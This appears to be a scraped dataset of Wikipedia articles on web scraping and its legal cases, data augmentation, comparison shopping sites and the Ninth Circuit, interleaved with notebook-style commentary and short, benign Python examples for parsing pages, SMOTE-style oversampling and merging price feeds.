279 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Legal_issues | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
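The row above names the two extraction techniques this notebook itself relies on: grep-style regular-expression matching over the raw HTML, and DOM parsing of the fetched page. Below is a minimal sketch of both, using the requests, re, and BeautifulSoup imports already loaded at the top of the notebook; the target URL and the e-mail pattern are illustrative only, not part of the scraped dataset.

```python
# A minimal sketch of the two extraction styles described in the row above,
# using the libraries already imported in this notebook (requests, re, bs4).
# The URL is just an example target; swap in the page you are scraping.
import re
import requests
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"
html = requests.get(url, timeout=10).text

# 1) Regular-expression matching (the "grep-style" approach): pull out
#    anything that looks like an e-mail address from the raw HTML.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)

# 2) DOM parsing: build a tree with BeautifulSoup and walk it for the data
#    of interest, here every external link on the page.
soup = BeautifulSoup(html, "html5lib")
links = [a["href"] for a in soup.find_all("a", href=True)
         if a["href"].startswith("http")]

print(f"{len(emails)} e-mail-like strings, {len(links)} external links")
```

The regex pass is fast but brittle; the DOM pass survives markup changes better, which is why the two are usually combined in practice.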
281 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_augmentation | Data augmentation is a statistical technique which allows maximum likelihood estimation from incomplete data. 1 2 Data augmentation has important applications in Bayesian analysis, 3 and the technique is widely used in machine learning to reduce overfitting when training machine learning models, 4 achieved by training models on several slightly-modified copies of existing data. Synthetic Minority Over-sampling Technique (SMOTE) is a method used to address imbalanced datasets in machine learning. In such datasets, the number of samples in different classes varies significantly, leading to biased model performance. For example, in a medical diagnosis dataset with 90 samples representing healthy individuals and only 10 samples representing individuals with a particular disease, traditional algorithms may struggle to accurately classify the minority class. SMOTE rebalances the dataset by generating synthetic samples for the minority class. For instance, if there are 100 samples in the majority class and 10 in the minority class, SMOTE can create synthetic samples by randomly selecting a minority class sample and its nearest neighbors, then generating new samples along the line segments joining these neighbors. This process helps increase the representation of the minority class, improving model performance. 5 When convolutional neural networks grew larger in mid 1990s, there was a lack of data to use, especially considering that some part of the overall dataset should be spared for later testing. It was proposed to perturb existing data with affine transformations to create new examples with the same labels, 6 which were complemented by so-called elastic distortions in 2003, 7 and the technique was widely used as of 2010s. 8 Data augmentation can enhance CNN performance and acts as a countermeasure against CNN profiling attacks. 9 Data augmentation has become fundamental in image classification, enriching training dataset diversity to improve model generalization and performance. The evolution of this practice has introduced a broad spectrum of techniques, including geometric transformations, color space adjustments, and noise injection. 10 Geometric transformations alter the spatial properties of images to simulate different perspectives, orientations, and scales. Common techniques include: Color space transformations modify the color properties of images, addressing variations in lighting, color saturation, and contrast. Techniques include: Injecting noise into images simulates real-world imperfections, teaching models to ignore irrelevant variations. Techniques involve: Residual or block bootstrap can be used for time series augmentation. Synthetic data augmentation is of paramount importance for machine learning classification, particularly for biological data, which tend to be high dimensional and scarce. The applications of robotic control and augmentation in disabled and able-bodied subjects still rely mainly on subject-specific analyses. Data scarcity is notable in signal processing problems such as for Parkinson's Disease Electromyography signals, which are difficult to source - Zanini, et al. noted that it is possible to use a generative adversarial network (in particular, a DCGAN) to perform style transfer in order to generate synthetic electromyographic signals that corresponded to those exhibited by sufferers of Parkinson's Disease. 
11 The approaches are also important in electroencephalography (brainwaves). Wang, et al. explored the idea of using deep convolutional neural networks for EEG-Based Emotion Recognition, results show that emotion recognition was improved when data augmentation was used. 12 A common approach is to generate synthetic signals by re-arranging components of real data. Lotte 13 proposed a method of "Artificial Trial Generation Based on Analogy" where three data examples x_1, x_2, x_3 provide examples and an artificial x_synthetic is formed which is to x_3 what x_2 is to x_1. A transformation is applied to x_1 to make it more similar to x_2, the same transformation is then applied to x_3 which generates x_synthetic. This approach was shown to improve performance of a Linear Discriminant Analysis classifier on three different datasets. Current research shows great impact can be derived from relatively simple techniques. For example, Freer 14 observed that introducing noise into gathered data to form additional data points improved the learning ability of several models which otherwise performed relatively poorly. Tsinganos et al. 15 studied the approaches of magnitude warping, wavelet decomposition, and synthetic surface EMG models (generative approaches) for hand gesture recognition, finding classification performance increases of up to 16% when augmented data was introduced during training. More recently, data augmentation studies have begun to focus on the field of deep learning, more specifically on the ability of generative models to create artificial data which is then introduced during the classification model training process. In 2018, Luo et al. 16 observed that useful EEG signal data could be generated by Conditional Wasserstein Generative Adversarial Networks (GANs) which was then introduced to the training set in a classical train-test learning framework. The authors found classification performance was improved when such techniques were introduced. The prediction of mechanical signals based on data augmentation brings a new generation of technological innovations, such as new energy dispatch, 5G communication field, and robotics control engineering. 17 In 2022, Yang et al. 17 integrate constraints, optimization and control into a deep network framework based on data augmentation and data pruning with spatio-temporal data correlation, and improve the interpretability, safety and controllability of deep learning in real industrial projects through explicit mathematical programming equations and analytical solutions. |
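The SMOTE idea summarized in the row above (synthetic minority samples generated along the line segment between a real sample and one of its nearest neighbours) is easy to sketch in a few lines of NumPy. This is an illustrative toy only, not a reference implementation; the function name, the choice of k, and the toy data are assumptions made for the example.

```python
import numpy as np

def smote_like_oversample(minority, n_new, k=3, seed=0):
    """Toy SMOTE-style oversampling: interpolate between a randomly chosen
    minority sample and one of its k nearest neighbours."""
    rng = np.random.default_rng(seed)
    minority = np.asarray(minority, dtype=float)
    synthetic = []
    for _ in range(n_new):
        i = rng.integers(len(minority))
        x = minority[i]
        # distances from x to every minority sample (index 0 is x itself)
        d = np.linalg.norm(minority - x, axis=1)
        neighbours = np.argsort(d)[1:k + 1]
        x_nn = minority[rng.choice(neighbours)]
        lam = rng.random()                       # point on the segment [x, x_nn]
        synthetic.append(x + lam * (x_nn - x))
    return np.vstack(synthetic)

# Toy example: 10 minority samples in 2-D, ask for 20 synthetic ones.
minority = np.random.rand(10, 2)
print(smote_like_oversample(minority, 20).shape)  # (20, 2)
```

The same interpolation idea underlies the "analogy" method described above for EEG trials, where the transformation mapping x_1 to x_2 is re-applied to x_3 to produce x_synthetic.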
282 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Comparison_shopping_website | A comparison shopping website, sometimes called a price comparison website, price analysis tool, comparison shopping agent, shopbot, aggregator or comparison shopping engine, is a vertical search engine that shoppers use to filter and compare products based on price, features, reviews and other criteria. Most comparison shopping sites aggregate product listings from many different retailers but do not directly sell products themselves, instead earning money from affiliate marketing agreements. In the United Kingdom, these services made between 780m and 950m in revenue in 2005 1 needs update . Hence, E-commerce accounted for an 18.2 percent share of total business turnover in the United Kingdom in 2012. Online sales already account for 13% of the total UK economy, and its expected to increase to 15% by 2017. There is a huge contribution of comparison shopping websites in the expansion of the current E-commerce industry. The first widely recognized comparison-shopping agent was BargainFinder, developed by Andersen Consulting (now Accenture). The team, led by researcher Bruce Krulwich, created BargainFinder in 1995 as an experiment and published it on-line without advance warning to the e-commerce sites being compared. The first commercial shopping agent, called Jango, was produced by Netbot, a Seattle startup company founded by University of Washington professors Oren Etzioni and Daniel S. Weld; Netbot was acquired by the Excite portal in late 1997. Junglee, a Bay-area startup, also pioneered comparison shopping technology and was soon acquired by Amazon.com. Other early comparison shopping agents included pricewatch.com and killerapp.com. NexTag another entry into comparison shopping was named Times magazine world top 50 website in 2008, 2 only to eventually close in 2018. 3 In 2005, PriceGrabber was acquired by Experian for $485 million, negotiated by then-CEO and founder of the company, Kamran Pourzanjani, along with Tamim Mourad, in 1999. 4 5 Around 2010, the price comparison websites found their way to emerging markets. Especially South-East Asia has been a place for many new comparison websites. citation needed It started in 2010 with CompareXpress in Singapore, and in the following years companies like Baoxian (China), Jirnexu (Malaysia), and AskHanuman (Thailand) followed. 6 Meanwhile, in developed markets, Google was accused of promoting Froogle and its replacement, the paid-placement-only Google Shopping, over competitors in its search results, driving down traffic to other sites and driving some out of business. 7 The European Commission began an investigation in 2010, which concluded in July 2017 with a 2.42 billion fine against the parent company Alphabet, and an order to change its practices within 90 days. 8 In the early development stage from 1995 to 2000, comparison shopping agents included not only price comparison but also rating and review services for online vendors and products. Altogether, there were three broad categories of comparison shopping services. 9 Later, through mergers and acquisitions, many services were consolidated. Through 1998 and 1999, various firms developed technology that searched retailers websites for prices and stored them in a central database. Users could then search for a product, and see a list of retailers and prices for that product. Advertisers did not pay to be listed but paid for every click on a price. 
Streetprices, founded in 1997, has been a very early company in this space; it invented price graphs and email alerts in 1998. 10 Price comparison sites can collect data directly from merchants. Retailers who want to list their products on the website then supply their own lists of products and prices, and these are matched against the original database. This is done by a mixture of information extraction, fuzzy logic and human labour. Comparison sites can also collect data through a data feed file. Merchants provide information electronically in a set format. This data is then imported by the comparison website. Some third party businesses are providing consolidation of data feeds so that comparison sites do not have to import from many different merchants. Affiliate networks aggregate data feeds from many merchants and provide them to the price comparison sites. Many of the popular shopping websites provide direct affiliation to the customer who wants to become affiliate partner. They provide their own API to the affiliate partner to show their products with specifications to the affiliate partner's website. This enables price comparison sites to monetize the products contained in the feeds by earning commissions on click through traffic. citation needed Other price comparison sites have deals with merchants and aggregate feeds using their own technology. citation needed In recent years, many off the shelf software solutions 11 have been developed that allow website owners to take price comparison websites' inventory data to place retailer prices (context adverts) on their blog or content the only website. In return, the content website owners receive a small share of the revenue earned by the price comparison website. This is often referred to as the revenue share 12 business model. Another approach is to crawl the web for prices. This means the comparison service scans retail web pages to retrieve the prices, instead of relying on the retailers to supply them. This method is also sometimes called 'scraping' information. Some, mostly smaller, independent sites solely use this method, to get prices directly from the websites that it is using for the comparison. Yet another approach to collect data is through crowdsourcing. This lets the price comparison engine collect data from almost any source without the complexities of building a crawler or the logistics of setting up data feeds at the expense of lower coverage comprehensiveness. Sites that use this method rely on visitors contributing pricing data. Unlike discussion forums, which also collect visitor input, price comparison sites that use this method combine data with related inputs and add it to the main database though collaborative filtering, artificial intelligence, or human labor. Data contributors may be rewarded for the effort through prizes, cash, or other social incentives. However, some combination of these two approaches is most frequently used. Some search engines are starting to blend information from standard feeds with information from sites where product stock-keeping units (SKUs) are unavailable. Empirical projects that assessed the functionality and performance of page-wise SSC engines (AKA bots) exist. These studies demonstrate that no best or parsimonious shopping bot exists with respect to price advantage. 13 14 Price comparison sites typically do not charge users anything to use the site. Instead, they are monetized through payments from retailers who are listed on the site. 
Depending on the particular business model of the comparison shopping site, retailers either pay a flat fee to be included on the site, pay a fee each time a user clicks through to the retailer web site, or pay every time a user completes a specified action—for example, when they buy something or register with their e-mail address. Comparison shopping sites obtain large product data feeds covering many different retailers from affiliate networks such as LinkShare and Commission Junction. There are also companies that specialize in data feed consolidation for the purpose of price comparison and that charge users for accessing this data. When products from these feeds are displayed on their sites they earn money each time a visitor clicks through to the merchant's site and buys something. Search results may be sorted by the amount of payment received from the merchants listed on the website. 15 large price comparison sites. 16 In addition to comparing tangible goods, some sites compare prices of services, such as insurance, credit cards, phone bills, and money transfer. Like most websites, price comparison websites partly rely on search engines for visitors. The general nature of shopping focused price comparison websites is that, since their content is provided by retail stores, content on price comparison websites is unlikely to be absolutely unique. The table style layout of a comparison website could be considered by Google as "Autogenerated Content and Roundup Comparison Type of Pages". 17 As of the 2011 updates to its search algorithm, known as Google Panda, Google seems to have started considering these comparison sites to be of low quality. 18 Due to large affiliate network providers providing easily accessible information on large amounts of similar products from multiple vendors, in recent years small price comparison sites have been able to use technology that was previously only available to large price comparison sites. 16 This technology includes software and plugins aimed to standardize the typical processes involving price and product comparison. Without much resources it became possible for amateurs to build seemingly professional websites, mostly using the popular Wordpress CMS. These small sites often rely on Google for their visitors, which are monetized using affiliate networks like Amazon. The low content quality of typical niche sites, often bordering on spam and fraud, is a growing problem from the perspective of consumer protection and the quality of search engines. By playing the algorithm of search engine giant Google, it is possible to place low quality sites prominently in the search results. Until recently the phenomenon of fake test or comparison websites had escaped public attention. An analysis by testbericht.de discovered that 34,6% of German search traffic related to product tests on the first page of google leads to fake test sites. 19 When a big German newspaper published a report about such a website 20 and consumer protection organization sending out warning letters, 20 observers started to note a sense of panic in the industry, with site owners changing or deleting the content in question. 21 Amazon, being the biggest player in the affiliate market, declined to comment on the matter. 19 Deceptive comparison sites give the impression of testing a product thoroughly. In reality, the tests are just an aggregation of freely available information, often leading to the most expensive products being recommended. 
This in turn increases the commission rate the site owners earn for the recommended products. 22 In 2017, the European Commission fined Google 2.42BN for allegedly monopolising the comparison shopping engine (CSE) market. 23 Google released a statement that the European Commission's assessment will be appealed. 24 Google will review the formal decision, but expects that it will accrue the fine in the second quarter of 2017. 25 |
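The "data feed" collection method described in the row above (merchants supply product lists in a set format, which the comparison site imports and matches) can be mocked up with the pandas and StringIO imports this notebook already uses. The CSV columns, merchant names, and prices below are invented purely for illustration of the aggregation step.

```python
# A minimal sketch of the data-feed approach: each merchant supplies a small
# CSV feed, the feeds are concatenated, and the cheapest offer per product
# is kept. Feed contents and column names are hypothetical.
import pandas as pd
from io import StringIO

feed_a = StringIO("sku,product,price\n101,USB-C cable,7.99\n102,Wireless mouse,24.50\n")
feed_b = StringIO("sku,product,price\n101,USB-C cable,6.49\n103,Laptop stand,31.00\n")

frames = []
for merchant, feed in [("MerchantA", feed_a), ("MerchantB", feed_b)]:
    df = pd.read_csv(feed)
    df["merchant"] = merchant
    frames.append(df)

all_offers = pd.concat(frames, ignore_index=True)
best = all_offers.loc[all_offers.groupby("product")["price"].idxmin()]
print(best[["product", "merchant", "price"]])
```

A real comparison engine would add fuzzy matching of product names across feeds, which is the information-extraction step the row mentions; the sketch assumes the feeds already share clean product names.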
283 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Ninth_Circuit | The United States Court of Appeals for the Ninth Circuit (in case citations, 9th Cir.) is the U.S. federal court of appeals that has appellate jurisdiction over the U.S. district courts in the following federal judicial districts: The Ninth Circuit also has appellate jurisdiction over the territorial courts for the District of Guam and the District of the Northern Mariana Islands. Additionally, it sometimes handles appeals that originate from American Samoa, which has no district court and partially relies on the District of Hawaii for its federal cases. 1 Headquartered in San Francisco, California, the Ninth Circuit is by far the largest of the 13 U.S. Courts of Appeals, covering a total of nine states and two territories and with 29 active judgeships. The court's regular meeting places are Seattle at the William Kenzo Nakamura United States Courthouse, Portland at the Pioneer Courthouse, San Francisco at the James R. Browning U.S. Court of Appeals Building, and Pasadena at the Richard H. Chambers U.S. Court of Appeals. Panels of the court occasionally travel to hear cases in other locations within the circuit. Although the judges travel around the circuit, the court arranges its hearings so that cases from the northern region of the circuit are heard in Seattle or Portland, cases from southern California and Arizona are heard in Pasadena, and cases from northern California, Nevada, Hawaii, and the Pacific territories are heard in San Francisco. Additionally, the court holds yearly sittings in Anchorage and Honolulu. For lawyers who must come and present their cases to the court in person, this administrative grouping of cases helps to reduce the time and cost of travel. Ninth Circuit judges are also appointed by the United States Secretary of the Interior to serve as temporary acting Associate Justices for non-federal appellate sessions at the High Court of American Samoa in Fagatogo. 1 The Ninth Circuit's large size is due to the dramatic increases in both the population of the western states and the court's geographic jurisdiction that have occurred since the U.S. Congress created the Ninth Circuit in 1891. 2 The court was originally granted appellate jurisdiction over federal district courts in California, Idaho, Montana, Nevada, Oregon, and Washington. As new states and territories were added to the federal judicial hierarchy in the twentieth century, many of those in the West were placed in the Ninth Circuit: the newly acquired Territory of Hawaii in 1900, Arizona upon its admission to the Union in 1912, the Territory of Alaska in 1948, Guam in 1951, and the Commonwealth of the Northern Mariana Islands in 1977. The Ninth Circuit also had jurisdiction over certain American interests in China, in that it had jurisdiction over appeals from the United States Court for China during the existence of that court from 1906 through 1943. 3 a However, the Philippines was never under the Ninth Circuit's jurisdiction. Congress never created a federal district court in the Philippines from which the Ninth Circuit could hear appeals. 4 Instead, appeals from the Supreme Court of the Philippines were taken directly to the Supreme Court of the United States. 5 In 1979, the Ninth Circuit became the first federal judicial circuit to set up a Bankruptcy Appellate Panel as authorized by the Bankruptcy Reform Act of 1978. 
The cultural and political jurisdiction of the Ninth Circuit is just as varied as the land within its geographical borders. In a dissenting opinion in a rights of publicity case involving the Wheel of Fortune star Vanna White, Circuit Judge Alex Kozinski sardonically noted that f or better or worse, we are the Court of Appeals for the Hollywood Circuit. 6 Judges from more remote parts of the circuit note the contrast between legal issues confronted by populous states such as California and those confronted by rural states such as Alaska, Idaho, Montana, and Nevada. Judge Andrew J. Kleinfeld, who maintains his judicial chambers in Fairbanks, Alaska, wrote in a letter in 1998: "Much federal law is not national in scope....It is easy to make a mistake construing these laws when unfamiliar with them, as we often are, or not interpreting them regularly, as we never do. 7 From 1999 to 2008, of the Ninth Circuit Court rulings that were reviewed by the Supreme Court, 20% were affirmed, 19% were vacated, and 61% were reversed; the median reversal rate for all federal appellate courts was 68.29% for the same period. 8 From 2010 to 2015, of the cases it accepted to review, the Supreme Court reversed around 79% of the cases from the Ninth Circuit, ranking its reversal rate third among the circuits; the median reversal rate for all federal circuits for the same time period was around 70 percent. 9 Some argue the court's high percentage of reversals is illusory, resulting from the circuit hearing more cases than the other circuits. This results in the Supreme Court reviewing a smaller proportion of its cases, letting stand the vast majority of its cases. 10 11 However, a detailed study in 2018 reported by Brian T. Fitzpatrick, a law professor at Vanderbilt University, looked at how often a federal circuit court was reversed for every thousand cases it terminated on the merits between 1994 and 2015. 12 The study found that the Ninth Circuit's decisions were reversed at a rate of 2.50 cases per thousand, which was by far the highest rate in the country, with the Sixth Circuit second as 1.73 cases per thousand. 13 12 Fitzpatrick also noted that the 9th Circuit was unanimously reversed more than three times as often as the least reversed circuits and over 20% more often than the next closest circuit. 12 Many commentators have argued that the Ninth Circuit faces several adverse consequences of its large size, 14 such as "unwieldly size, procedural inefficiencies, jurisprudential unpredictability, and unusual en banc process. 15 Chief among these is the Ninth Circuit's unique rules concerning the composition of an en banc court. In other circuits, en banc courts are composed of all active circuit judges, plus (depending on the rules of the particular court) any senior judges who took part in the original panel decision. By contrast, in the Ninth Circuit it is impractical for 29 or more judges to take part in a single oral argument and deliberate on a decision en masse. The court thus provides for a limited en banc review by the Chief Judge and a panel of 10 randomly selected judges. 16 This means that en banc reviews may not actually reflect the views of the majority of the court and indeed may not include any of the three judges involved in the decision being reviewed in the first place. The result, according to detractors, is a high risk of intracircuit conflicts of law where different groupings of judges end up delivering contradictory opinions. 
